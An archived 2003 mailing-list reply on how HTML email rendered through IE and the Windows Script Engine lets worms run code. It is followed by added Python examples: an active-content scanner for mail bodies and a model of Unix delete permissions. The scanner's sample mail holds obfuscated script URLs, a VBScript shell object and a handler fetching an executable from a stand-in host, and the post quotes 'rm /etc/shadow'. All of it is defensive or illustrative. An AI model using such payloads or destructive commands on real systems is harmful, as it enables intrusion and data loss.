Email Clients and digital signatures
Sat Jul 5 20:47:02 2003
On Saturday 05 Jul 2003 5:45 pm, CL Gilbert wrote:
> I don't comprehend this. A script is not allowed to run local programs.
Of course it is allowed - the default action is to allow execution of any
But VBScript/ActiveX is involved and therefore so is the system registry, the main Windows API and through that the CPU. Windows scripting worms are capable of downloading malicious code completely without intervention (other than allowing HTML emails to be viewed as HTML).

This works because HTML emails are rendered using IE and therefore the usual IE vulnerabilities are added to the mail client. So by constructing a deliberate page that automatically loads the code, then constructing a matching email worm to load that URL in the email preview, the trojan can be installed. As noted in the quote below, the malicious web page could simply be emailed directly, cutting out one step but still exposing the true vulnerability: IE and its propensity to help malicious HTML email.
The Windows Script Engine provides Windows operating systems with the ability to execute script code. Script code can be used to add functionality to web pages, or to automate tasks within the operating system or within a program. Script code can be written in several different scripting languages, such as Visual Basic Script, or JScript.

A flaw exists in the way by which the Windows Script Engine for JScript processes information. An attacker could exploit the vulnerability by constructing a web page that, when visited by the user, would execute code of the attacker's choice with the user's privileges. The web page could be hosted on a web site, or sent directly to the user in email.
It has already been done, email worms are currently out there that can and have performed exactly these operations. (Not always with the nicety of obeying the user's privileges - which are weakly enforced at best.)

The people who write these malicious pages and scripts are not short of time, intent or ability. You might think it isn't worth it, but there are plenty of people who see it as extremely entertaining.

There are tips available to bolster Windows' poor security, including on my
> ~ And certainly NOT automatically. Anything you start on your own is
Not true. Automation is easy. Automation IS THE DEFAULT ACTION! The Windows Scripting Engine is always loaded within Windows (Win95/98 allowed uninstallation, later versions try to reinstall at reboot) and is always ready to execute ANY active code that is passed along. IE will, by default, ALWAYS pass on ALL active code to WSE. This is ostensibly because IE and Explorer are meant to operate together and this is the source of the problems. Explorer is meant to operate WSE and run local macros, automate desktop tasks, load programs silently, etc. Netscape doesn't have these vulnerabilities because it isn't part of Explorer. IE cannot easily avoid calling WSE. If it did, Outlook would not become vulnerable in turn.
The core problem is that Windows treats all users as the system administrator and assumes that all users have the authority to e.g. format the C: drive. Unix/Linux realise that not all users can be trusted not to do this - least of all automated tasks running in what should be the 'user' environment. When running Linux as an ordinary user (99.9999% of the time), I cannot delete anything except what is in my own user space. I cannot overwrite system files, I cannot amend or add to system settings. I cannot run programs that have the authority to change any of these things.
A simple example. From the command line (DOS), type:
What, you can delete all three? In Unix/Linux you get:
$ rm /etc/shadow
$ rm /usr/bin/gcc-3.2.2
$ rm /usr/bin/mozilla
Any program I execute in Windows runs with full privileges. Any program I execute in Linux runs only as a user. (And before you mention Windows user logins and user passwords, there are known ways around these too.)
> your own fault. The only scripting I am aware of that is allowed is
> page. like i said, its in a sandbox. the worse trick people have been
Not true. The sandbox doesn't exist - it was never even conceived. Windows 3.x is the basis of the system and was never intended to be opened up to the outside world. The sandbox was to be the entire PC, but by the time MS grudgingly admitted that users actually wanted the internet, the box was already looking like swiss cheese.
> |>~ Outlook is not supposed to automatically *run* arbitrary scripts. When
> |>it does, that's an error.
> still disagree. that has nothing to do with outlook, and Linux even has
> a fileroler or something that can start programs based on extensions.
Within the user space, not within the system space. Plus all Linux clients DEFAULT to not running these extensions and provide warnings that doing so could compromise system security.

The program you are thinking of depends on which environment the user chooses: Nautilus in Gnome or Konqueror in KDE. Neither executes arbitrary code on a web page or in HTML email within the local environment.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
-----END PGP SIGNATURE-----
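The message above turns on two claims: that the danger of HTML mail is the client handing the markup to an engine that will execute whatever active content it finds, and that the fix at the client is not to render it as live HTML. The following is an added example, written for this page and not code from the message's author or from any mail client: a scanner that inspects an HTML mail body before any renderer sees it and reports every construct that could trigger script or an external fetch. It uses only the Python standard library; SAMPLE_MAIL is a constructed message (the CLSID is an all-zero placeholder, not a real control), and the tag and attribute lists are the example's own choice of what counts as active.

```python
"""Flag active content in an HTML mail body before any renderer sees it.

The inverse of letting IE/WSE execute whatever an HTML mail contains is to
inspect the HTML first.  This scanner reports script elements, event-handler
attributes, script-scheme URLs (including ones obfuscated with character
references or embedded whitespace) and resources fetched automatically from
remote hosts.  SAMPLE_MAIL is a constructed example, not a real worm.
"""
from html.parser import HTMLParser

# Example policy: which constructs the scanner treats as active content.
ACTIVE_TAGS = {"script", "object", "embed", "applet", "iframe", "frame"}
URL_ATTRS = {"href", "src", "action", "data", "codebase", "background"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")
REMOTE_SCHEMES = ("http://", "https://")


def _compact(value: str) -> str:
    """Lower-case and drop all whitespace so 'JAVA\\nSCRIPT:' reads as 'javascript:'."""
    return "".join(value.split()).lower()


class ActiveContentScanner(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: list[str] = []

    # HTMLParser lower-cases tag and attribute names and decodes character
    # references inside attribute values before this method is called.
    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"{tag}: active element")
        for name, value in attrs:
            value = _compact(value or "")
            if name.startswith("on"):
                self.findings.append(f"{tag}: event handler {name}")
            elif name in URL_ATTRS and value.startswith(SCRIPT_SCHEMES):
                self.findings.append(f"{tag}: {name} uses script scheme")
            elif name in URL_ATTRS and tag != "a" and value.startswith(REMOTE_SCHEMES):
                # <a href> only fetches on click; img/iframe/etc. fetch on render.
                self.findings.append(f"{tag}: remote fetch via {name}")


def scan(html: str) -> list[str]:
    """Return every active-content finding in the given HTML body, in document order."""
    parser = ActiveContentScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed example body.  The CLSID is an all-zero placeholder, not a real control.
SAMPLE_MAIL = """\
<html><body>
<p>Your order has shipped.</p>
<img src="http://tracker.example/px.gif" width="1" height="1">
<a href="JAVA&#10;SCRIPT:alert(1)">View invoice</a>
<div onmouseover="window.open('http://tracker.example/update.exe')">Details</div>
<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<script language="VBScript">CreateObject("WScript.Shell")</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_MAIL):
        print(finding)
```

A client or gateway that refuses to render (or strips) any body with a non-empty finding list gets the behaviour the message attributes to the Linux clients: the HTML is shown as inert text or plain text, and the engine never sees the active parts. Note that the `&#10;` in the `href` is decoded by the parser before the scheme check, which is why the whitespace is collapsed rather than matched literally.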
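The `rm /etc/shadow` comparison above rests on the Unix rule that removing a file is controlled by the permissions of the directory holding it (write plus search), with the extra sticky-bit rule on world-writable directories such as /tmp, and that only uid 0 bypasses those bits. This is an added example, not code from the message or its author: the check is written as a pure function over mode bits so the user-space/system-space boundary can be exercised without touching a live filesystem. All inode values (modes, owner and group ids, the group id 42 for "shadow") are hypothetical, modelled on a typical Linux install rather than read from any system.

```python
"""Why `rm /etc/shadow` fails for an ordinary user but succeeds for root.

unlink(2) is governed by the permission bits of the *directory* containing
the entry (write + search), plus the sticky-bit rule on directories such as
/tmp; the file's own mode is irrelevant.  uid 0 bypasses the mode bits.
The inodes below are hypothetical examples, not read from a real system.
"""
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Principal:
    uid: int
    gids: frozenset          # primary plus supplementary group ids


@dataclass(frozen=True)
class Inode:
    mode: int                # st_mode permission bits, may include S_ISVTX
    uid: int
    gid: int


def class_bits(node: Inode, who: Principal) -> int:
    """Select the owner, group or other rwx triple that applies to `who`."""
    if who.uid == node.uid:
        return (node.mode >> 6) & 0o7
    if node.gid in who.gids:
        return (node.mode >> 3) & 0o7
    return node.mode & 0o7


def can_unlink(directory: Inode, entry: Inode, who: Principal) -> bool:
    """Discretionary access check for unlink(2) of `entry` inside `directory`."""
    if who.uid == 0:
        return True                          # root bypasses DAC mode bits
    need = stat.S_IWOTH | stat.S_IXOTH       # w and x, as a 3-bit triple (0o3)
    if class_bits(directory, who) & need != need:
        return False
    if directory.mode & stat.S_ISVTX:        # sticky dir: must own file or dir
        return who.uid in (entry.uid, directory.uid)
    return True


# Hypothetical inodes (ids are illustrative, not taken from any system).
ETC      = Inode(mode=0o755,  uid=0,    gid=0)      # /etc
SHADOW   = Inode(mode=0o640,  uid=0,    gid=42)     # /etc/shadow, group "shadow"
USR_BIN  = Inode(mode=0o755,  uid=0,    gid=0)      # /usr/bin
MOZILLA  = Inode(mode=0o755,  uid=0,    gid=0)      # /usr/bin/mozilla
TMP      = Inode(mode=0o1777, uid=0,    gid=0)      # /tmp, sticky
HOME     = Inode(mode=0o755,  uid=1000, gid=1000)   # /home/user
MY_NOTES = Inode(mode=0o644,  uid=1000, gid=1000)   # a file the user owns
OTHERS   = Inode(mode=0o644,  uid=1001, gid=1001)   # another user's file in /tmp

USER = Principal(uid=1000, gids=frozenset({1000}))
ROOT = Principal(uid=0, gids=frozenset({0}))


def demo() -> dict:
    """Return the outcome of each rm attempt, keyed by a short label."""
    return {
        "user rm /etc/shadow":       can_unlink(ETC, SHADOW, USER),
        "user rm /usr/bin/mozilla":  can_unlink(USR_BIN, MOZILLA, USER),
        "user rm ~/notes":           can_unlink(HOME, MY_NOTES, USER),
        "user rm /tmp/own-file":     can_unlink(TMP, MY_NOTES, USER),
        "user rm /tmp/others-file":  can_unlink(TMP, OTHERS, USER),
        "root rm /etc/shadow":       can_unlink(ETC, SHADOW, ROOT),
    }


if __name__ == "__main__":
    for label, allowed in demo().items():
        print(f"{label:26s} -> {'removed' if allowed else 'Permission denied'}")
```

The two /tmp cases are the part the message's three-command example does not show: a world-writable directory still lets a user delete only their own entries once the sticky bit is set, which is the same "user space, not system space" boundary applied to shared scratch space. A script or worm running as uid 1000 is bound by exactly these results, whatever it was told to do.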